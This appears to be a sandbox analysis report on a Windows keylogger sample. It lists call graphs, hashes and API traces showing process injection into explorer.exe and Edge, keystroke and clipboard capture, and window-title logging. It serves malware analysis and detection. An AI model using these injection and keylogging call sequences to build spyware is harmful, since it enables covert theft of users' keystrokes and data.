                                                                                                                                        • Instruction ID: 85f6cfab369b637923fe0198a007771ef9b2936c5095f6918d92a65f37878cc6
                                                                                                                                        • Opcode Fuzzy Hash: 96575270710c45fdef7c0448f299781a83eda711e6678c48e365be49451f61e8
                                                                                                                                        • Instruction Fuzzy Hash: C1F09075902218FF9B10CF909D98CEE776CEB02255B54036AF91093160D7314F84E6A0

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:8.8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:9
                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                        execution_graph 765 779fab 766 779fd8 765->766 768 779ff8 765->768 769 77a048 766->769 773 77a04d 769->773 770 77a135 LoadLibraryA 770->773 771 77a190 VirtualProtect VirtualProtect 772 77a1e8 771->772 772->772 773->770 773->771 774 77a185 773->774 774->768

                                                                                                                                        Callgraph

                                                                                                                                        callgraph 0 Function_00771576 1 Function_00772BF4 2 Function_00772774 3 Function_00771B70 4 Function_00771E70 5 Function_00772B70 32 Function_00771838 5->32 50 Function_00771A04 5->50 6 Function_007730F0 12 Function_00771860 6->12 25 Function_00771C58 6->25 6->32 56 Function_00771A88 6->56 58 Function_00772508 6->58 7 Function_007725FC 8 Function_007714F9 9 Function_007718F8 10 Function_00772860 10->2 10->3 39 Function_00772620 10->39 11 Function_00771560 12->3 13 Function_007724E0 14 Function_0077156C 15 Function_007718E8 16 Function_0077B0D5 17 Function_00771254 18 Function_007714D4 19 Function_00771DD4 19->32 20 Function_00772054 20->4 20->9 20->12 21 Function_007718D0 20->21 28 Function_00771F40 20->28 20->32 33 Function_00771938 20->33 45 Function_00772010 20->45 53 Function_0077188C 20->53 22 Function_00771D50 22->32 23 Function_0077355C 23->3 23->6 23->23 23->32 38 Function_00773220 23->38 24 Function_00774059 26 Function_007725C4 26->7 27 Function_00774A41 28->9 28->32 29 Function_0077A048 54 Function_0077A00A 29->54 30 Function_007714B2 31 Function_00771BB0 34 Function_00772CB8 34->12 34->32 40 Function_00771D20 34->40 35 Function_007745A7 36 Function_00771822 37 Function_007741A1 38->3 38->10 38->31 38->32 38->33 43 Function_00771C28 38->43 57 Function_00771C08 38->57 41 Function_00773020 41->3 48 Function_00772E98 41->48 42 Function_00779FAB 42->29 44 Function_0077B115 45->50 46 Function_0077141D 47 Function_00772418 47->12 47->20 47->32 48->1 48->5 48->19 48->34 48->50 59 Function_00772E08 48->59 49 Function_00771405 51 Function_00771000 52 Function_00772E80 53->32 55 Function_00771508 58->13 58->21 58->26 59->12 59->15 59->22 59->47 60 Function_00773088 60->3 60->48

Control-flow Graph

APIs
• NtUnmapViewOfSection.NTDLL ref: 007735D8
Memory Dump Source
• Source File: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, Offset: 00771000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_771000_explorer.jbxd
Yara matches
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
• Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
• Instruction ID: 73de265d2fd155b89473184314cd049e79995ad05f42afc80c7ec7a6f719380e
• Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
• Instruction Fuzzy Hash: 0311C430711A099FEF58BBBC989E67937A1FB14341F54812AA41DC76A1DA3D8A40C701

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, Offset: 00771000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_771000_explorer.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
• String ID:
• API String ID: 2482764027-0
• Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
• Instruction ID: 57fbfd9eae7bac2701c0fffb4ceaa8801eee6624a4a28eae3a27f9e96fdd021d
• Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
• Instruction Fuzzy Hash: 0F8135312187488FEB1ADF64EC58BEAB7A1FB51780F54862A9447C7160EF7CDA04DB81

Control-flow Graph

APIs
• LoadLibraryA.KERNELBASE ref: 0077A147
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0077A1BB
• VirtualProtect.KERNELBASE ref: 0077A1D9
Memory Dump Source
• Source File: 00000012.00000002.4123114957.0000000000777000.00000040.80000000.00040000.00000000.sdmp, Offset: 00777000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_777000_explorer.jbxd
Similarity
• API ID: ProtectVirtual$LibraryLoad
• String ID:
• API String ID: 895956442-0
• Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
• Instruction ID: f2ccead5af2106c5ba01ca93e5c0d365f8b6830ab99de6d187fd4ab9fec633d1
• Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
• Instruction Fuzzy Hash: 4C518B3135891D5AFF24AA389CC46BDB3D1E795365F544A3AD08EC3285F91DD846C383

Execution Graph

Execution Coverage: 9.6%
Dynamic/Decrypted Code Coverage: 97.5%
Signature Coverage: 17.7%
Total number of Nodes: 322
Total number of Limit Nodes: 4

Callgraph


Control-flow Graph

APIs
  • Part of subcall function 02EF2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02EF29F3,-00000001,02EF128C), ref: 02EF2731
  • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
  • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
• RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02EF1038
• RtlMoveMemory.NTDLL(00000000,?,?), ref: 02EF106C
• NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02EF1075
• GetCurrentProcessId.KERNEL32(?,02EF1010), ref: 02EF107B
• wsprintfA.USER32 ref: 02EF10E7
• RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02EF1155
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02EF1160
• Process32First.KERNEL32(00000000,?), ref: 02EF117F
• CharLowerA.USER32(?), ref: 02EF1199
• lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02EF11B5
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02EF1212
• Process32Next.KERNEL32(00000000,00000128), ref: 02EF126C
• CloseHandle.KERNEL32(00000000), ref: 02EF127F
• Sleep.KERNELBASE(000003E8), ref: 02EF129F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                        • API String ID: 3206029838-2805246637
                                                                                                                                        • Opcode ID: ba6307cd1353bdc5c008a9e561fc350564db41e93cc103e59104bc3a673c34db
                                                                                                                                        • Instruction ID: 0fd746b216f38d6f93c3cf19739e3b407c0e90447a6e4daf2c9cd93cd9193c26
                                                                                                                                        • Opcode Fuzzy Hash: ba6307cd1353bdc5c008a9e561fc350564db41e93cc103e59104bc3a673c34db
                                                                                                                                        • Instruction Fuzzy Hash: 73511B30AC03449BD7D4EFB1D844A7A779AEBC4744F809929FF098B2C0EB3099458E61

Control-flow Graph

APIs
  • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
  • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
• wsprintfA.USER32 ref: 02EF10E7
  • Part of subcall function 02EF276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02EF2777
  • Part of subcall function 02EF276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02EF10FE), ref: 02EF2789
• RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02EF1155
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02EF1160
• Process32First.KERNEL32(00000000,?), ref: 02EF117F
• CharLowerA.USER32(?), ref: 02EF1199
• lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02EF11B5
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02EF1212
• Process32Next.KERNEL32(00000000,00000128), ref: 02EF126C
• CloseHandle.KERNEL32(00000000), ref: 02EF127F
• Sleep.KERNELBASE(000003E8), ref: 02EF129F
Strings
Memory Dump Source
• Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
Similarity
• API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
• String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
• API String ID: 3018447944-2805246637
• Opcode ID: 3224f34c0507d996af11d1546eca5879584bda30ca99cf6eadeda5980be11bf0
• Instruction ID: cf916c4034dd686261309397e6bb2e79ec7d67fd30535c0183824ab17d22b4a5
• Opcode Fuzzy Hash: 3224f34c0507d996af11d1546eca5879584bda30ca99cf6eadeda5980be11bf0
• Instruction Fuzzy Hash: 6F410E306C43449BD7D4EFB1884497E779AEBC4754F409928FF4A8B1C0EB30D9459E61

Control-flow Graph
(graph rendered as text: function 2ef9ae0, basic blocks 2ef9ae0 through 2ef9cad; API calls reached from the graph: LoadLibraryA, GetProcAddress, VirtualProtect * 2; executed / not executed legend omitted)
Memory Dump Source
• Source File: 00000013.00000002.4123291639.0000000002EF8000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2ef8000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 58aa2ae726f6cb9fae6899fc115e329ef707962e204ca4a1ecf8058cfa77fb81
• Instruction ID: 9cc52786d43e4efdf0ae4d7bee95b1929ffff955b21f51bc8c94145e61d693d1
• Opcode Fuzzy Hash: 58aa2ae726f6cb9fae6899fc115e329ef707962e204ca4a1ecf8058cfa77fb81
• Instruction Fuzzy Hash: 845149B1A846528BD7608E78CCE07F0B794EB81228B189779C6E6CB3C7E7945806C764

Control-flow Graph
(graph rendered as text: function 2ef276d, basic blocks 2ef276d-2ef277f OpenFileMappingA, 2ef2781-2ef2791 MapViewOfFile, 2ef2794-2ef2798; executed / not executed legend omitted)
APIs
• OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02EF2777
• MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02EF10FE), ref: 02EF2789
Memory Dump Source
• Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
Similarity
• API ID: File$MappingOpenView
• String ID:
• API String ID: 3439327939-0
• Opcode ID: 6362d92363eb1a87dbcf5a7b55e0d0515b7105649de0adad1d65075f1a263c3e
• Instruction ID: 5d49b6ed8d2bd92ed1a681db32ff05d5976d620696fc15cdc57972977815c3a6
• Opcode Fuzzy Hash: 6362d92363eb1a87dbcf5a7b55e0d0515b7105649de0adad1d65075f1a263c3e
• Instruction Fuzzy Hash: FFD01231B812317BD3745A776C0CF837E9DDFC5AE1B014025B60DD2140E6508810C2F0

Control-flow Graph
(graph rendered as text: function 2ef275a, single basic block 2ef275a-2ef276c calling UnmapViewOfFile and CloseHandle; executed / not executed legend omitted)
APIs
• UnmapViewOfFile.KERNEL32(00000000,?,02EF129A,00000001), ref: 02EF275E
• CloseHandle.KERNELBASE(?,?,02EF129A,00000001), ref: 02EF2765
Memory Dump Source
• Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
Similarity
• API ID: CloseFileHandleUnmapView
• String ID:
• API String ID: 2381555830-0
• Opcode ID: 9ac1cd08dec6568aeb58976598fe59a461252a58390c6cec6dc26baa6d2ff410
• Instruction ID: c2a16f7d9f9190215072f252f6dd589b9523b267bc7790b20f34831aa857c7ca
• Opcode Fuzzy Hash: 9ac1cd08dec6568aeb58976598fe59a461252a58390c6cec6dc26baa6d2ff410
• Instruction Fuzzy Hash: C7B01236CC607097C3942736780C8DB3F18EFC922134509C6F30D8150057240891C6EC

Control-flow Graph
(graph rendered as text: function 2ef2a09, single basic block 2ef2a09-2ef2a19 calling GetProcessHeap and RtlAllocateHeap; executed / not executed legend omitted)
APIs
• GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
• RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
Memory Dump Source
• Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: 1f8f8c705b4447f65206f4ae68c31eab1900a25461ae81106b640ad5bd64c736
• Instruction ID: 069e3b29b02bea07f5c832dfbc12eaf15eeb3164076a5c80bebc02f4a6e7df03
• Opcode Fuzzy Hash: 1f8f8c705b4447f65206f4ae68c31eab1900a25461ae81106b640ad5bd64c736
• Instruction Fuzzy Hash: C9A002B1ED01406BDD845BA5990DF157758A7C4702F4049C67346C5440DD7554D48721

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02EF29F3,-00000001,02EF128C), ref: 02EF2731
                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 02EF18F4
                                                                                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02EF192F
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02EF19BF
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,02EF3638,00000016), ref: 02EF19E6
                                                                                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02EF1A0E
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02EF1A1E
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02EF1A38
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02EF1A40
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1A4E
                                                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1A55
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02EF1A6B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EF1A72
                                                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02EF1A88
                                                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02EF1AB2
                                                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02EF1AC5
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1ACC
                                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1AD3
                                                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02EF1AE7
                                                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02EF1AFE
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1B0B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1B11
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1B17
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02EF1B1A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                        • String ID: atan$ntdll$opera_shared_counter
                                                                                                                                        • API String ID: 1066286714-2737717697
                                                                                                                                        • Opcode ID: 5c71a3d7d071e7e92991fb19d2f3deff48f3a0e388e80bdf724d01ab51bcc794
                                                                                                                                        • Instruction ID: 23ed4b0b279add955bed6d08e1dfa18347182cbfaf1651c985fafa5d702a5cdf
                                                                                                                                        • Opcode Fuzzy Hash: 5c71a3d7d071e7e92991fb19d2f3deff48f3a0e388e80bdf724d01ab51bcc794
                                                                                                                                        • Instruction Fuzzy Hash: 6061AE31A84349EFD790DF258C84E6BBBEDEB88758F404959FA49D7280D770D8448B62
                                                                                                                                        Control-flow Graph (graph image not reproduced in text)
                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02EF27B5
                                                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02EF27CD
                                                                                                                                        • lstrlen.KERNEL32(?,00000000), ref: 02EF27D5
                                                                                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02EF27E0
                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02EF27FA
                                                                                                                                        • wsprintfA.USER32 ref: 02EF2811
                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 02EF282A
                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02EF2834
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                        • String ID: %02X
                                                                                                                                        • API String ID: 3341110664-436463671
                                                                                                                                        • Opcode ID: 2c7f4d655d324b0bcc5cc6b39c37e2999912e61f84d25e79665c4ad5ad0b91de
                                                                                                                                        • Instruction ID: 4332d21890182f56721838b11f95d6f57e1366346d40b7f92bef5298626373cf
                                                                                                                                        • Opcode Fuzzy Hash: 2c7f4d655d324b0bcc5cc6b39c37e2999912e61f84d25e79665c4ad5ad0b91de
                                                                                                                                        • Instruction Fuzzy Hash: 391182B1D80148BFEB519B96DC48EEEBF7DEB88305F5044A6FB05E2100D7314E519B60
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 02EF1652
                                                                                                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 02EF167A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardStateUnicode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3453085656-3916222277
                                                                                                                                        • Opcode ID: d75f62a43f54eff80c96e27d27d7d7afa9f19469c41357645b9b25ab415f3e0c
                                                                                                                                        • Instruction ID: 52f94302c1e17278f116af3542af777ddc3bf4526a06f066c99f3bff41cc9b3d
                                                                                                                                        • Opcode Fuzzy Hash: d75f62a43f54eff80c96e27d27d7d7afa9f19469c41357645b9b25ab415f3e0c
                                                                                                                                        • Instruction Fuzzy Hash: 8401D632D8020DDBDB70CA11D944BFB73BCAF45708F4A942AEB09EA040D730D5818AA1
                                                                                                                                        Control-flow Graph (graph image not reproduced in text)
                                                                                                                                        APIs
                                                                                                                                        • RtlZeroMemory.NTDLL(02EF5013,0000001C), ref: 02EF13C8
                                                                                                                                        • VirtualQuery.KERNEL32(02EF13AE,?,0000001C), ref: 02EF13DA
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02EF140B
                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 02EF141C
                                                                                                                                        • wsprintfA.USER32 ref: 02EF1433
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02EF1448
                                                                                                                                        • GetLastError.KERNEL32 ref: 02EF144E
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(02EF582C), ref: 02EF1465
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 02EF1489
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 02EF14A6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EF14AF
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 02EF14D0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EF14D3
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02EF14F1
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 02EF150D
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF1514
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 02EF152A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                                        • API String ID: 3628807430-1779906909
                                                                                                                                        • Opcode ID: 2f837a755a895473434a32e050b7527463e0e4cca2bc6569747b503d29e98a0a
                                                                                                                                        • Instruction ID: e036639069bdfade118dbe9b40a3c30a3ec241548d7fd640b4c3a6a5c362b85e
                                                                                                                                        • Opcode Fuzzy Hash: 2f837a755a895473434a32e050b7527463e0e4cca2bc6569747b503d29e98a0a
                                                                                                                                        • Instruction Fuzzy Hash: 8541D970EC0348FBE7D0AB66DC19E1A3B6EFBD4754780D859FB068A640DB7194508BA1
                                                                                                                                        Control-flow Graph (graph image not reproduced in text)
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02EF582C), ref: 02EF16C4
                                                                                                                                        • lstrlenW.KERNEL32 ref: 02EF16DB
                                                                                                                                        • lstrlenW.KERNEL32 ref: 02EF16F3
                                                                                                                                        • wsprintfW.USER32 ref: 02EF1743
                                                                                                                                        • GetForegroundWindow.USER32 ref: 02EF174E
                                                                                                                                        • GetWindowTextW.USER32(00000000,02EF5850,00000800), ref: 02EF1767
                                                                                                                                        • GetClassNameW.USER32(00000000,02EF5850,00000800), ref: 02EF1774
                                                                                                                                        • lstrcmpW.KERNEL32(02EF5020,02EF5850), ref: 02EF1781
                                                                                                                                        • lstrcpyW.KERNEL32(02EF5020,02EF5850), ref: 02EF178D
                                                                                                                                        • wsprintfW.USER32 ref: 02EF17AD
                                                                                                                                        • lstrcatW.KERNEL32 ref: 02EF17C6
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02EF582C), ref: 02EF17D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                                                        • API String ID: 2651329914-3371406555
                                                                                                                                        • Opcode ID: 822ad708b9a90ccc1894f8bf3e8e6e5c7b2a8ac0dc23c4ff5f93fca43ab7e1ab
                                                                                                                                        • Instruction ID: 7e14fe499e39cf52d8a7d5fe8e23112c844dad85a40d8c9bc17c43db98c12080
                                                                                                                                        • Opcode Fuzzy Hash: 822ad708b9a90ccc1894f8bf3e8e6e5c7b2a8ac0dc23c4ff5f93fca43ab7e1ab
                                                                                                                                        • Instruction Fuzzy Hash: 0121DB30DC0248FBD3E02B27EC44A2B3F59EBC17547D4D864F70956541CB218C61C6B5
                                                                                                                                        Control-flow Graph (graph image not reproduced in text)
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 02EF2603
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02EF260B
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02EF261B
                                                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 02EF2629
                                                                                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02EF2648
                                                                                                                                        • SuspendThread.KERNEL32(00000000), ref: 02EF2658
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF2667
                                                                                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 02EF2677
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF2682
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1467098526-0
                                                                                                                                        • Opcode ID: b93adb883909f984c02d74c0c4b54f0d38b7fb8f8c06ef38dadb8edd9a64203e
                                                                                                                                        • Instruction ID: 224a5e0d2f9fd8a2c72ce2a7ac213b80287433bf7382216559d071adabf53c69
                                                                                                                                        • Opcode Fuzzy Hash: b93adb883909f984c02d74c0c4b54f0d38b7fb8f8c06ef38dadb8edd9a64203e
                                                                                                                                        • Instruction Fuzzy Hash: F5118671CC5240EFD7419F61A84CA6EBFA4EFC4705F41489AFB4692540D7308995CBA7
                                                                                                                                        Control-flow Graph (graph image not reproduced in text; legend: Executed / Not Executed; graph root at 2ef20a1)
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                          • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                          • Part of subcall function 02EF298A: lstrlen.KERNEL32(02EF4FE2,?,00000000,00000000,02EF20DD,74DE8A60,02EF4FE2,00000000), ref: 02EF2992
                                                                                                                                          • Part of subcall function 02EF298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02EF4FE2,00000001,00000000,00000000), ref: 02EF29A4
                                                                                                                                          • Part of subcall function 02EF24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02EF24DE
